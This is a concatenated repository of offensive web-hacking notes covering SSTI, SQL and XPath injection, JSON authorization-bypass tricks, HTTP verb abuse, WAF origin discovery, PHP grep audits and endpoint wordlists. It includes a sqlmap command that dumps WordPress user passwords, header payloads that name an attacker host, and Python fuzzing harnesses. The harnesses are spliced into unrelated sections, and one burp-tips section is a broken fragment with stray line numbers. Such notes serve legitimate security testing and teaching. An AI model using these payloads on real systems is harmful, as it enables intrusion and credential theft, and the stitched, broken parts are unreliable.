-------------------------------------------------------------------------------- /tools/wfuzz.md: --------------------------------------------------------------------------------
# Wfuzz

-------------------------------------------------------------------------------- /README.md: --------------------------------------------------------------------------------
---
description: "Aggregate Concatenation of Anti-Sec Notes ad nauseam \U0001F3F4 by Jann Moon \U0001F318"
---

# 💣 Infosec Corruption

Greetings destroyers, breakers, cyber-demolitionists, anti-sec defilers, and
annihilationists! 🙏

Welcome to my eternally amassing repository of notes about hacking, bug bounty and general offensive infosec knowledge I've picked up from books, blogs, CTFs, courses and experience. Hope it helps some of y'all. 😺

http://github.com/scumdestroy

-------------------------------------------------------------------------------- /burp-suite/autorize.md: --------------------------------------------------------------------------------
---
description: Finding authorization issues with autorize
---

# Autorize

### Basic workflow

1. Log in to the target application as a low-privileged or unauthenticated user.
2. Open the Autorize tab in Burp and keep it off while configuring.
3. Click Configuration.
4. Click "Fetch cookies from last request" so Autorize captures the low-privileged session.
5. Open an incognito window in your browser.
6. Log in as a higher-privileged user.
7. Click the "Autorize is off" button to turn it on.
8. Browse the site as the privileged user, focusing on areas that require privileged accounts and on actions a lower-privileged user should not be able to perform. Autorize replays every request with the low-privileged cookies and compares the two responses.
9. Frown at the results until you find something interesting: a request marked "Bypassed!" (the low-privileged replay got the same response as the privileged original) is a candidate authorization flaw, and anything marked "Is enforced???" needs a manual look.

-------------------------------------------------------------------------------- /api-attacks/json-testing-in-apis.md: --------------------------------------------------------------------------------
# JSON testing in APIs

**Types of JSON data and how to fuzz them**

* string : `"whatever u want"`, `"191919"`
* number : `123`
* object : `{ }`
* array : `[ ]`
* boolean : `true`/`false`
* null : `null`

Try mixing data types as well as trying different values while fuzzing. Validators often check presence or truthiness rather than type, so a value of the wrong type can skip a check, reach a different code path, or crash the handler (a 500 with a stack trace is a finding in itself).

For example, an auth token should be a string, therefore try…

* `{"authtoken": true, ...}`
* `{"authtoken": [], ...}`
* `{"authtoken": {}, ...}`
* `{"authtoken": 0, ...}`
* `{"authtoken": [true, "your-secret"], ...}`

For **DoS** (making the server choke on parsing or allocation), `10e307` is close to the largest value a 64-bit IEEE double can hold (about 1.8e308); anything bigger parses as infinity or throws, and handlers that cast it to an integer or use it as a size fail badly. Put it in number parameters (i.e. `limit`, `per_page`, etc.):

`{..., "limit": 10e307}`

-------------------------------------------------------------------------------- /waf-bypasses/tools-and-resources.md: --------------------------------------------------------------------------------
# Tools and Resources

**TOOLS**

{% embed url="https://github.com/LandGrey/abuse-ssl-bypass-waf" %}

{% embed url="https://github.com/enablesecurity/wafw00f" %}

{% embed url="https://github.com/stamparm/identywaf" %}

[**https://github.com/lightbulb-framework/lightbulb-framework**](https://github.com/lightbulb-framework/lightbulb-framework)

{% embed url="https://github.com/khalilbijjou/wafninja" %}

**BYPASS WAF for Burp Suite**
[**https://portswigger.net/bappstore/ae2611da3bbc4687953a1f4ba6a4e04c**](https://portswigger.net/bappstore/ae2611da3bbc4687953a1f4ba6a4e04c)

[**https://github.com/migolovanov/libinjection-fuzzer**](https://github.com/migolovanov/libinjection-fuzzer)

**LINKS**

{% embed url="https://github.com/0xInfection/Awesome-WAF" %}

-------------------------------------------------------------------------------- /bug-bounty-web-hacking/ssti.md: --------------------------------------------------------------------------------
---
description: Server Side Template Injection
---

# SSTI

Another vulnerability born of unsanitized input. It occurs when user input is concatenated into the template source itself (rather than handed to the template as data), so the template engine evaluates whatever the user wrote. It is not as common as XSS or SQLi, simply because building a template out of user input is rarer than echoing user input or passing it to a back-end database.
In addition, only applications that build templates this way are exposed, but a successful attack ranges from disclosure of private data (config, environment, other users' objects) all the way to RCE through the engine's object model.

Generally pretty simple to test for. Drop a payload like `${{7*7}}` (a combined probe covering both `${7*7}` and `{{7*7}}`) or `#{7*7}`, or go engine by engine: `{{7*7}}` (Jinja2, Twig), `${7*7}` (FreeMarker, Velocity, Mako), `<%= 7*7 %>` (ERB), `#{7*7}` (Ruby interpolation, Slim). If the web app renders a 49 instead of echoing the payload back, the bounty gates will open for you and dazzle you with riches (hopefully). Use factors whose product cannot already be sitting on the page, and confirm the engine with a second, syntax-specific payload before writing anything up.
_Also, you can of course test for XSS, SQLi and any other input madness of interest to you._

-------------------------------------------------------------------------------- /tools/web-scanners.md: --------------------------------------------------------------------------------
---
description: >-
  A gang of automated web-scanners that check for multiple vulnerabilities or
  conduct several recon steps for the lazy and uninitiated, because we can't
  always be expected to perform exceptionally.
---

# Web-scanners

Some of these tools are so easy to use that you just point one at a domain with a single command-line flag and burn through 50+ tests at the push of a button. It is important to understand what they are doing (or the output will be of little use in actually exploiting or reporting the vulnerability) and to be able to run each test by hand, because you may have to: after gaining a shell on a box without these tools, where file transfers are blocked, where a firewall drops everything, where you are stuck as an unprivileged user, or in a situation that requires serious stealth.
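The SSTI probe described above, as an added example that is not part of these notes: it sends arithmetic in several template syntaxes and reports which of them the target evaluated. `render_page` and `render_page_safe` are constructed stand-ins for a vulnerable and a fixed "Hello name" page so the script runs offline; the engine labels per syntax are hints only, since several engines share a syntax.

```python
import random
import re

# Syntaxes to probe: (engines that commonly use it, wrapper with %s for the expression).
# A hit tells you the input is evaluated, not yet which engine; confirm with
# engine-specific payloads afterwards.
PROBES = [
    ("jinja2/twig/nunjucks", "{{%s}}"),
    ("freemarker/velocity/mako", "${%s}"),
    ("erb", "<%%= %s %%>"),
    ("ruby interpolation/slim", "#{%s}"),
    ("smarty", "{%s}"),
]


def fresh_expression():
    """Two random four-digit factors instead of 7*7: a '49' can sit on a page by
    accident, the exact product of two random numbers almost never does."""
    a, b = random.randint(1000, 9999), random.randint(1000, 9999)
    return "%d*%d" % (a, b), str(a * b)


def detect_ssti(send):
    """send(payload) -> response body. Returns the labels whose payload was evaluated."""
    hits = []
    for label, wrapper in PROBES:
        expr, expected = fresh_expression()
        payload = wrapper % expr
        body = send(payload)
        # Reflected-but-unevaluated input is not a finding: the raw payload must be gone.
        if expected in body and payload not in body:
            hits.append(label)
    return hits


# ---- constructed stand-ins for the target (assumption: a "Hello <name>" page) ----
_MUSTACHE = re.compile(r"\{\{(.*?)\}\}")


def _engine_eval(expr):
    """Stand-in for the template engine. Only int*int is evaluated so this mock
    cannot run arbitrary code; a real engine would evaluate anything."""
    m = re.fullmatch(r"\s*(\d+)\*(\d+)\s*", expr)
    return str(int(m.group(1)) * int(m.group(2))) if m else "{{%s}}" % expr


def render_page(name):
    """Vulnerable: the template source is built by concatenating user input,
    so the engine evaluates whatever the user wrote."""
    template = "<h1>Hello " + name + "</h1>"
    return _MUSTACHE.sub(lambda m: _engine_eval(m.group(1)), template)


def render_page_safe(name):
    """Fixed: the template is constant and the input is passed in as data."""
    template = "<h1>Hello {{name}}</h1>"
    return _MUSTACHE.sub(lambda m: name if m.group(1) == "name" else m.group(0), template)


if __name__ == "__main__":
    print("vulnerable:", detect_ssti(render_page))
    print("fixed:", detect_ssti(render_page_safe))
```

Against a live target, `send` is whatever puts the payload into the parameter under test and returns the body; keep the reflected-payload check, because a page that echoes `{{1234*5678}}` unchanged is plain reflection, not SSTI.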

**Recon-ng**

**Sn1per**

**Yuki-Chan**

**Nikto**

**Arachni**

**Recsech**

**ReconCobra**

**Raccoon**

**Reconnoitre**

-------------------------------------------------------------------------------- /burp-suite/turbo-intruder.md: --------------------------------------------------------------------------------
# Turbo Intruder

Highlight what you want to fuzz and send the request to Turbo Intruder.

Customize the Python script that opens if you want.

The highlighted part of the request is replaced with `%s` (payloads will be placed here).

**Filtering boring results**

Example: keep only responses whose status line says 200.

```python
def handleResponse(req, interesting):
    if '200 OK' in req.response:
        table.add(req)
```

The default script uses the same pattern (it filters on `req.status`); change the condition to whatever separates interesting responses, such as `req.status`, `req.length`, `req.wordcount` or a string in `req.response`.

**Speed tuning:**

`pipeline`

`requestsPerConnection`

`concurrentConnections`

The goal is to get your retries counter close to 0.

You can also gain speed by changing **GET** to **HEAD** or by shrinking the request.

**Finding race conditions** - the default mode isn't great for this. To find a race condition you want your requests to hit the target in as small a window as possible, which you do by queuing all of them before starting the request engine (gate the queued requests, then open the gate); Turbo Intruder ships with an example of this (race.py).

It also comes with...

* special wordlists (two of them, shown in the bundled example script):
  * one very long brute-force list
  * one containing every word observed in in-scope proxy traffic

-------------------------------------------------------------------------------- /burp-suite/other-extensions.md: --------------------------------------------------------------------------------
# Other extensions

**SAML RAIDER**

* SSO + federated logins
* attacks on assertions from the IdP (XML attacks such as signature wrapping)
* signature manipulation (tampering with attributes, replay, re-signing)
* certificate stripping
* authentication and authorization bypass, privilege escalation

_HOW TO ATTACK WITH SAML RAIDER_

1. Sign the message
2. Sign the assertion
3. Sign the assertion and later sign the message
4. Tampering
5. Public keys + certificates
6. Service provider and identity provider

**Backslash Powered Scanner - efficient at finding...**

* research-grade vulns
* high-hanging fruit
* injection vulns
* input filtering
* red teaming
* WAF bypasses

**AUTO REPEATER**

Auto-duplicate/modify/resend any request

Conditional replacements

* quick header/cookie/param replacements
* difference viewer
* renameable tabs

Best use cases:

* test every req.
made from one user as multiple others
* test every req. from a user without authentication
* test every request without CSRF mitigation params
* replace every instance of a parameter named email with another email
* perform any combination of these

-------------------------------------------------------------------------------- /api-attacks/api-soap-wsdl-tricks.md: --------------------------------------------------------------------------------
# API/SOAP/WSDL Tricks

* SQL injection test
  * wildcards: `*` and `%`
  * `' or 1=1--`
  * empty strings, or `' or "='`

_Login then login then login then login_

* try normal, then mix up correct, expired and faulty session IDs

Login, get session ID

* logout
* make a request while logged out with the session ID
* request with an expired ID
* request with a faulty session ID
* how about two IDs logged in simultaneously and sending requests

Send

* username and password
* just password
* just username
* username and username
* password and password
* nothing, just `<login> </logiN>`
* `<user_name> <pass_word>`
* `<user> <pass>`
* `<username> <pass>`
* `<user> bigboy </user>`
* `mypassword </password>`
* make payloads gigantic

**XPath injection:**

```xml
<login>
string(//user[username/text()='' or '1' = '1' and password/text()='' or '1' = '1'])
</login>
```

Looking for BOLA (IDOR) in APIs? Got 401/403 errors?

AuthZ bypass tricks:

* Wrap the ID in an array: `{"id":111}` --> `{"id":[111]}`
* JSON-wrap it: `{"id":111}` --> `{"id":{"id":111}}`
* Send the ID twice (parameter pollution): `URL?id=<LEGIT>&id=<VICTIM>`
* Send a wildcard: `{"user_id":"*"}`

-------------------------------------------------------------------------------- /bug-bounty-web-hacking/http-methods-vulns..md: --------------------------------------------------------------------------------
# HTTP Methods Vulns.

**PUT** : lets a client store data or files on the server; if it is enabled without authorization and path restrictions, an attacker can write malicious code (a web shell) onto the server.

**DELETE :** delete important shit.

**CONNECT :** another HTTP method that usually isn't available to clients; if the server (or a reverse proxy in front of it) honours it, you can tunnel arbitrary TCP through the server, reach internal hosts, slip past perimeter filtering and IDS, and move files in and out.

**HEAD :** although typically not seen as a vulnerable method, it slips through wherever authorization is defined per method. For example, a Java `web.xml` `<security-constraint>` that lists only `GET` and `POST` in its `<http-method>` elements leaves `HEAD` (and every other verb) unconstrained, so `HEAD` can be used to bypass the authorization check and reach the protected servlet.

`nmap -p 80,443 --script http-methods --script-args http-methods.retest=1 <target>`

Or you can manually send requests via netcat, telnet, Postman, Burp's Repeater or any client that can speak to SOAP/REST.
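The per-method probing described above, as an added example that is not from these notes: it requests a protected path with every verb unauthenticated, then checks whether a front end's verb block can be stepped around with `X-HTTP-Method-Override`. `app` is a constructed stand-in modelled on a `web.xml` constraint that lists only GET and POST, sitting behind an edge proxy that refuses PUT and DELETE by name; its behaviour is an assumption for the demonstration, not taken from any real product.

```python
METHODS = ["GET", "POST", "HEAD", "PUT", "DELETE", "OPTIONS", "PATCH", "TRACE", "CONNECT", "FOO"]


def app(method, path, headers=None, session=None):
    """Constructed target chain: edge proxy -> servlet security-constraint -> handler.
    Returns (status, body)."""
    headers = headers or {}
    # Edge proxy: refuses dangerous verbs by name only (an override header sails past it).
    if method in ("PUT", "DELETE", "TRACE", "CONNECT"):
        return 405, ""
    # Servlet container: the constraint lists GET and POST, so every other verb is
    # "uncovered" and reaches the servlet without authentication.
    if path.startswith("/admin") and session is None and method in ("GET", "POST"):
        return 401, ""
    # Framework: honours X-HTTP-Method-Override on POST, like many REST stacks.
    effective = headers.get("X-HTTP-Method-Override", method).upper() if method == "POST" else method
    if effective in ("GET", "HEAD"):
        return 200, "" if effective == "HEAD" else "user list: alice,bob"
    if effective in ("PUT", "DELETE"):
        return 200, "%s applied to %s" % (effective, path)
    return 405, ""


def probe_methods(send, path):
    """Try every verb unauthenticated. Verbs whose status differs from the baseline
    GET and are not plain 405/501 rejections come back as {verb: status}."""
    baseline = send("GET", path)[0]
    found = {}
    for verb in METHODS:
        status = send(verb, path)[0]
        if status not in (baseline, 405, 501):
            found[verb] = status
    return found


def probe_override(send, path, session):
    """For verbs the front end rejects, check whether POST plus
    X-HTTP-Method-Override reaches the same handler. Needs a session here,
    because POST itself is constrained."""
    found = {}
    for verb in ("PUT", "DELETE", "PATCH"):
        direct = send(verb, path, session=session)[0]
        via = send("POST", path, headers={"X-HTTP-Method-Override": verb}, session=session)[0]
        if direct in (405, 501) and via == 200:
            found[verb] = via
    return found


if __name__ == "__main__":
    print(probe_methods(app, "/admin/users"))            # {'HEAD': 200}
    print(probe_override(app, "/admin/users", "alice"))   # {'PUT': 200, 'DELETE': 200}
```

A HEAD that returns 200 where GET returns 401 is the web.xml case from the notes: the body is empty by definition, but the status, the Content-Length and any custom headers prove the servlet ran. For a real target, `send` wraps your HTTP client of choice and passes the verb through verbatim (libraries that normalise unknown verbs will hide the `FOO` case).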
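The type-mixing from the JSON testing page and the ID-wrapping tricks above, as one added example that is not from these notes: a generator that produces every mutation of a JSON body, a harness that keeps the responses that differ from the baseline, and a constructed endpoint with three common shortcuts (a truthiness check on the token, a string method called on it without a type check, and an ownership check that only runs when the id is an integer) to show which mutations land. The record table, the `tok_` token format and the user names are assumptions.

```python
SECRET_PREFIX = "tok_"                      # constructed token format
OWNER_OF = {111: "alice", 222: "bob"}       # constructed record ownership

# The JSON type ladder from the notes: each value gets swapped for every other type.
TYPE_VARIANTS = [True, False, 0, -1, 10e307, "", [], {}, None]


def mutate_body(body):
    """Yield (description, mutated_body) pairs, one mutation at a time."""
    for key, value in body.items():
        # 1. type confusion
        for alt in TYPE_VARIANTS:
            if alt != value:
                yield "%s -> %r" % (key, alt), {**body, key: alt}
        # 2. wrapping: the original value is still "in there" for a lenient lookup
        yield "%s wrapped in array" % key, {**body, key: [value]}
        yield "%s wrapped in object" % key, {**body, key: {key: value}}
        yield "%s mixed array" % key, {**body, key: [True, value]}
        # 3. wildcard: some filters pass it straight through to the query
        yield "%s wildcard" % key, {**body, key: "*"}


def _lookup(rid):
    """Constructed data layer: lenient, unwraps [x] and {"id": x} before querying."""
    while isinstance(rid, (list, dict)):
        rid = (rid[0] if rid else None) if isinstance(rid, list) else rid.get("id")
    return OWNER_OF.get(rid)


def target(body, user="alice"):
    """Constructed endpoint: fetch a record by id as `user`. Returns (status, body)."""
    token = body.get("authtoken")
    if not token:                                   # bug 1: truthiness, not validation
        return 401, "missing token"
    try:
        if not token.startswith(SECRET_PREFIX):     # bug 2: assumes a string
            return 401, "bad token"
    except AttributeError as exc:
        return 500, "TypeError: %s" % exc           # unhandled type: stack trace leaks
    rid = body.get("id")
    if isinstance(rid, int) and OWNER_OF.get(rid) != user:
        return 403, "forbidden"                     # bug 3: only ints get the ownership check
    owner = _lookup(rid)
    return (200, "record of %s" % owner) if owner else (404, "no such record")


def fuzz(endpoint, body):
    """Send every mutation; keep the responses that differ from the baseline."""
    baseline = endpoint(body)
    findings = {}
    for desc, mutated in mutate_body(body):
        resp = endpoint(mutated)
        if resp != baseline:
            findings[desc] = resp
    return baseline, findings


def bypasses(findings):
    """Mutations that got a 200 where the baseline did not: candidate BOLAs."""
    return sorted(desc for desc, (status, _) in findings.items() if status == 200)


if __name__ == "__main__":
    base, found = fuzz(target, {"authtoken": "tok_alice", "id": 222})
    print("baseline:", base)                       # (403, 'forbidden')
    for desc, resp in found.items():
        print("%-28s -> %s" % (desc, resp))
    print("bypasses:", bypasses(found))            # ['id wrapped in array', 'id wrapped in object']
```

The two wraps reach bob's record because the ownership check and the lookup disagree about what an id is, which is exactly the mismatch the array/object tricks exploit; the token mutations never log you in, but the 500s from `True`, `-1`, `1e+308` and the wrapped forms are the "changes in server response" the notes say to chase. Duplicate keys (`{"id":111,"id":222}`) cannot be expressed with a dict, so build that one as raw text.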

**HTTP HEADERS**

```
X-Forwarded-Host
X-Forwarded-Port
X-Forwarded-Scheme
Origin: null
Origin: [siteDomain].attacker.com
X-Frame-Options: Allow
X-Forwarded-For: 127.0.0.1
X-Client-IP: 127.0.0.1
Client-IP: 127.0.0.1
```

**---For injecting BXSS (blind XSS) || SQLi payloads---**

```
Referer
X-Wap-Profile
X-Original-Url
Forwarded
X-Originated-IP
X-Client-IP
From
User-Agent
```

**---Possible file upload vulnerabilities---**
`X-HTTP-Method-Override: PUT`

-------------------------------------------------------------------------------- /waf-bypasses/cloudflare.md: --------------------------------------------------------------------------------
---
description: >-
  Truly an adversary of mine, not by their cleverness and cunning, mostly by
  their endless numbers, seemingly haunting me at every turn..
---

# Cloudflare

**Finding a website's real IP address**

Finding the origin IP address behind Cloudflare lets you scan the real host directly, which often turns up vulnerabilities and other hidden goods that are less well protected, because the owner expects the WAF to take care of any intruders by annoying them until they give up and move on to another target.

Some options you have at your disposal:

This beautiful website keeps track of records sites may have had before signing up with Cloudflare:
[http://crimeflare.org:82/cfs.html](http://crimeflare.org:82/cfs.html)

You can also see DNS history on
[netcraft.com](https://toolbox.netcraft.com)
[viewdns.info](https://viewdns.info)
[securitytrails.com](https://securitytrails.com)

You can also do enumeration and recon on subdomains, MX records and other assets with simple tools like `dig` and `nslookup`; origins commonly leak through records that were never moved behind the proxy (mail, ftp, dev, staging) and through the domain's own MX, SPF and TXT records.

You can also try sending an e-mail to a fake address at the domain you are attempting to uncover (fakeyfakestrom8888888889@cloudydomain.com): the bounce you get back may carry the mail server's IP in its Received headers if you examine the full headers in your mail client or in Wireshark. That reveals the mail host, which is only the web origin when the site hosts its own mail, so the outcome is rarely better than digging into the MX records, and it is arguably noisier if you are trying to stay off their radar.

-------------------------------------------------------------------------------- /.gitbook/assets/businesslogic.txt: --------------------------------------------------------------------------------
Identify the logic attack surface
What does the application do, what is the most valuable thing in it, what would an attacker want to access?

Test transmission of data via the client
Is there a desktop application or mobile application, and does the transfer of information differ between it and the web application?

Test for reliance on client-side input validation
Does the application base its logic on the client side? For example, do forms have a client-side maximum length that can be edited in the browser and is simply accepted as true by the server?

Test any thick-client components (Java, ActiveX, Flash)
Does the application use something like Java, Flash, ActiveX or Silverlight? Can you download the applet and reverse engineer it?

Test multi-stage processes for logic flaws
Can you go from placing an order straight to delivery, thus bypassing payment, or a similar process?

Test handling of incomplete input
Can you pass the application dodgy input and does it process it as normal? This can point to other issues such as RCE and XSS.

Test trust boundaries
What is a user trusted to do? Can they access admin aspects of the app?

Test transaction logic
Can you pay £0.00 for an item that should be £1,000,000, etc.?

Test for insecure direct object references (IDOR)
Can you increment through items, users, UUIDs or other sensitive info?

-------------------------------------------------------------------------------- /bug-bounty-web-hacking/application-and-business-logic.md: --------------------------------------------------------------------------------
---
description: >-
  Oftentimes, bounty hunters need to get across the impact of the vulnerability,
  sometimes to those with less technical understanding than us. Some concepts
  to guide your testing and frame your report
---

# Application & Business Logic

* **Identify the logic attack surface.** What does the application do, what is the most valuable thing in it, what would an attacker want to access?
* **Test transmission of data via the client.** Is there a desktop application or mobile application, and does the transfer of information differ between it and the web application?
* **Test for reliance on client-side input validation.** Does the application base its logic on the client side? For example, do forms have a client-side maximum length that can be edited in the browser and is simply accepted as true by the server?
* **Test any thick-client components (Java, ActiveX, Flash).** Does the application use something like Java, Flash, ActiveX or Silverlight? Can you download the applet and reverse engineer it?
* **Test multi-stage processes for logic flaws.** Can you go from placing an order straight to delivery, thus bypassing payment, or a similar process?
* **Test handling of incomplete input.** Can you pass the application dodgy input and does it process it as normal? This can point to other issues such as RCE and XSS.
* **Test trust boundaries.** What is a user trusted to do? Can they access admin aspects of the app?
* **Test transaction logic.** Can you pay £0.00 for an item that should be £1,000,000, etc.?
* **Test for insecure direct object references (IDOR).** Can you increment through items, users, UUIDs or other sensitive info?

-------------------------------------------------------------------------------- /api-penetration-testing/api-soap-wsdl-tricks.md: --------------------------------------------------------------------------------
# API/SOAP/WSDL Tricks

* Classic SQL injection test / payload-stuffing assault (i.e. `' or '1'='1 --`)
  - Trying to use a POST, JSON or even SOAP/XML request? Copy-paste it from Burp into a file, tag your intended injection point with a `*` and hand it to sqlmap or ghauri with `-r muh_req.req`.
* Pop in some wildcards: `*` and `%`
* Throw in some empty strings, or `'`, `"`, `=`
* Mess around with logging in repeatedly: _Login then login then login then login_, and watch what the server does with the earlier sessions.
* Try using a valid session or UUID, then mix it up with (other people's) correct, expired and faulty session IDs. Note changes in server response time and minimal differences in response size or content, and investigate deeper.

Quick login testing methodology run:
- Login, get session ID
- logout
- make a request while logged out with the session ID
- request with an expired ID
- request with a faulty session ID
- how about two IDs logged in simultaneously and sending requests (parameter pollution? race condition? almost anything you can do to a normal web app)

More tests to try, just to show the mindset. Try sending...
* username and password
* just password
* just username
* username and username
* password and password
* nothing, just `<login> </logiN>`
* `<user_name> <pass_word>`
* `<user> <pass>`
* `<username> <pass>`
* `<user> bigboy </user>`
* `mypassword </password>`
* make payloads gigantic

### **XPath injection:**

```xml
<login>
string(//user[username/text()='' or '1' = '1' and password/text()='' or '1' = '1'])
</login>
```

### **JSON data desecration**

Some things you can use to get BOLAs/IDORs, bypass auth or produce another mysterious outcome in your favour!

* Wrap the ID in an array: `{"id":111}` --> `{"id":[111]}`
* JSON-wrap it: `{"id":111}` --> `{"id":{"id":111}}`
* Send a wildcard: `{"user_id":"*"}`

-------------------------------------------------------------------------------- /SUMMARY.md: --------------------------------------------------------------------------------
# Table of contents

* [💣 Infosec Corruption](README.md)

## Bug-Bounty/Web-Hacking

* [Application & Business Logic](bug-bounty-web-hacking/application-and-business-logic.md)
* [Command Injection](bug-bounty-web-hacking/command-injection.md)
* [CRLF](bug-bounty-web-hacking/other-attacks.md)
* [CSRF](bug-bounty-web-hacking/csrf.md)
* [HTTP Methods Vulns.](bug-bounty-web-hacking/http-methods-vulns..md)
* [IDORs / Auth. Bugs](bug-bounty-web-hacking/untitled.md)
* [LFI](bug-bounty-web-hacking/lfi.md)
* [SSRF](bug-bounty-web-hacking/ssrf.md)
* [SSTI](bug-bounty-web-hacking/ssti.md)
* [Code Analysis : PHP & grep](bug-bounty-web-hacking/php-grep-payloads.md)

## Burp Suite

* [Autorize](burp-suite/autorize.md)
* [Burp tips](burp-suite/burp-tips.md)
* [Methodology](burp-suite/methodology.md)
* [Intruder Payload Processing](burp-suite/intruder-payload-processing.md)
* [Other extensions](burp-suite/other-extensions.md)
* [Turbo Intruder](burp-suite/turbo-intruder.md)

## API Penetration Testing

* [API attacks](api-penetration-testing/api-attacks.md)
* [API/SOAP/WSDL Tricks](api-penetration-testing/api-soap-wsdl-tricks.md)
* [Checklist](api-penetration-testing/checklist.md)
* [Common endpoints](api-penetration-testing/common-endpoints.md)
* [JSON testing in APIs](api-penetration-testing/json-testing-in-apis.md)
* [31 days of API security tricks](api-penetration-testing/31-days-of-api-security-tricks.md)

## Tools

* [Nmap](tools/nmap.md)
* [Web-scanners](tools/web-scanners.md)
* [Recon-ng](tools/recon-ng.md)
* [Wfuzz](tools/wfuzz.md)

## WAF Bypasses

* [General WAF torment](waf-bypasses/general-waf-torment.md)
* [Cloudflare](waf-bypasses/cloudflare.md)
* [Testing Methodology/Evasion techniques](waf-bypasses/testing-methodology-evasion-techniques.md)
* [Tools and Resources](waf-bypasses/tools-and-resources.md)

## Enumeration

* [Port 139, 445 : SMB/NetBIOS](enumeration/port-139-445-smb-netbios.md)

-------------------------------------------------------------------------------- /burp-suite/burp-tips.md: --------------------------------------------------------------------------------
---
description: A few things to use sometimes to get it in
---

# Burp tips

* 
search `"` 34 | * \`\` 35 | 36 | 37 | 38 | -------------------------------------------------------------------------------- /bug-bounty-web-hacking/php-grep-payloads.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: 'If the source code gets leaky, dig through the spaghetti a little.' 3 | --- 4 | 5 | # Code Analysis : PHP & grep 6 | 7 | PHP Vulnerabilities could fill a library and will likely continue to fill evermore through the years of this language's livelihood on the web. If you do get a chance to see the source code of a web app; be it open-source on github, a white-box test or just a poorly implemented leaky framework, here are some golden nuggets to grep for. 8 | 9 | **XSS:** 10 | grep -Ri "echo" . 11 | grep -Ri "$_" . \| grep "echo" 12 | grep -Ri "$\_GET" . \| grep "echo" 13 | grep -Ri "$\_POST" . \| grep "echo" 14 | grep -Ri "$\_REQUEST" . \| grep "echo" 15 | 16 | **Command execution:** 17 | grep -Ri "shell\_exec\(" . 18 | grep -Ri "system\(" . 19 | grep -Ri "exec\(" . 20 | grep -Ri "popen\(" . 21 | grep -Ri "passthru\(" . 22 | grep -Ri "proc\_open\(" . 23 | grep -Ri "pcntl\_exec\(" . 24 | 25 | **Code execution:** 26 | grep -Ri "eval\(" . 27 | grep -Ri "assert\(" . 28 | grep -Ri "preg\_replace" . \| grep "/e" 29 | grep -Ri "create\_function\(" . 30 | 31 | **SQL Injection:** 32 | grep -Ri "$sql" . 33 | grep -Ri "$sql" . \| grep "$_" 34 | 35 | **SQLMAP Cheatsheet for WordPress:** 36 | `sqlmap -u "`[`http://target.tld/?paramater=1`](http://target.tld/?paramater=1)`" -p "parameter" --technique=B --dbms=mysql --suffix=")--" --string="Test" --sql-query="select user`_`login,user_pass from wp_users"` 37 | 38 | **Information leak via phpinfo:** 39 | grep -Ri "phpinfo" . 40 | 41 | **Find dev and debug modes:** 42 | grep -Ri "debug" . 43 | grep -Ri "$\_GET\['debug'\]" . 44 | grep -Ri "$\_GET\['test'\]" . 45 | 46 | **RFI/LFI:** 47 | grep -Ri "file\_include" . 48 | grep -Ri "include\(" . 
49 | grep -Ri "require\(" . 50 | grep -Ri 'require\($file\)' . 51 | grep -Ri "include\_once\(" . 52 | grep -Ri "require\_once\(" . 53 | grep -Ri "require\_once\(" . \| grep '$_' 54 | 55 | **Misc:** 56 | grep -Ri "header\(" . \| grep '$\_' 57 | grep -RiF '$\_SERVER\["HTTP\_USER\_AGENT"\]' . 58 | 59 | **Path Traversal:** 60 | grep -Ri file\_get\_contents . 61 | For a broader automated sweep, RATS is an auditing tool for C, C++, Perl, PHP and Python. 62 | 63 | -------------------------------------------------------------------------------- /api-attacks/common-endpoints.md: -------------------------------------------------------------------------------- 1 | # Common endpoints 2 | 3 | actuator 4 | 5 | health 6 | 7 | trace 8 | 9 | logfile 10 | 11 | metrics 12 | 13 | heapdump 14 | 15 | status 16 | 17 | ping 18 | 19 | api-docs 20 | 21 | application.wadl 22 | 23 | doc 24 | 25 | docs 26 | 27 | swagger-ui.html 28 | 29 | swagger.json 30 | 31 | jolokia 32 | 33 | apis 34 | 35 | api/v1/ 36 | 37 | healthz 38 | 39 | metrics 40 | 41 | swagger.json 42 | 43 | api/proxy 44 | 45 | download 46 | 47 | readfile 48 | 49 | read\_file 50 | 51 | fetch 52 | 53 | admin 54 | 55 | api/proxy?url= 56 | 57 | api/payment?id= 58 | 59 | heapdump 60 | 61 | admin/heapdump 62 | 63 | manage/heapdump 64 | 65 | actuator/heapdump 66 | 67 | solr 68 | 69 | Search-Replace-DB/ 70 | 71 | Search-Replace-DB-master/ 72 | 73 | adminer.sql 74 | 75 | composer.json 76 | 77 | manifest.json 78 | 79 | temp/ 80 | 81 | data/ 82 | 83 | test 84 | 85 | debug 86 | 87 | backup 88 | 89 | old 90 | 91 | \_admin 92 | 93 | backup 94 | 95 | application.wadl 96 | 97 | metrics 98 | 99 | graph 100 | 101 | .svn 102 | 103 | mw-config 104 | 105 | dev 106 | 107 | maintenance 108 | 109 | status2 110 | 111 | \_legacy 112 | 113 | 2 114 | 115 | graph 116 | 117 | graphiql 118 | 119 | graphql 120 | 121 | graphql-explorer 122 | 123 | graphql/cponsole 124 | 125 | heapdump 126 | 127 | jenkins/script 128 | 129 | manage/hea\[du,\[ 130 | 131 | secure/attachmentzip 132 | 133 | 
secure/configurereport.jspa 134 | 135 | testing 136 | 137 | version 138 | 139 | out 140 | 141 | sr 142 | 143 | sj 144 | 145 | charts 146 | 147 | secure/configurereport!default.jspa 148 | 149 | api/batch 150 | 151 | proxy/ 152 | 153 | metrics 154 | 155 | Target/proxy/attacker\_IP/attacker\_port/ 156 | 157 | ui/\#/app 158 | 159 | java 160 | 161 | dashboard 162 | 163 | pprof 164 | 165 | proxy 166 | 167 | nomad 168 | 169 | nomad/global/ 170 | 171 | nomad/global/cluster 172 | 173 | .php.swp 174 | 175 | test/ 176 | 177 | demo 178 | 179 | .git 180 | 181 | secret 182 | 183 | actuator 184 | 185 | beans 186 | 187 | service?wsdl 188 | 189 | passwords 190 | 191 | system/console 192 | 193 | config 194 | 195 | upload 196 | 197 | files 198 | 199 | proxy 200 | 201 | server-status 202 | 203 | web-INF/web.xml 204 | 205 | -------------------------------------------------------------------------------- /api-penetration-testing/common-endpoints.md: -------------------------------------------------------------------------------- 1 | # Common endpoints 2 | 3 | API Endpoint lists can be created by your experiences, pulling words you think might fit or automatically with a tool like Cewl. 
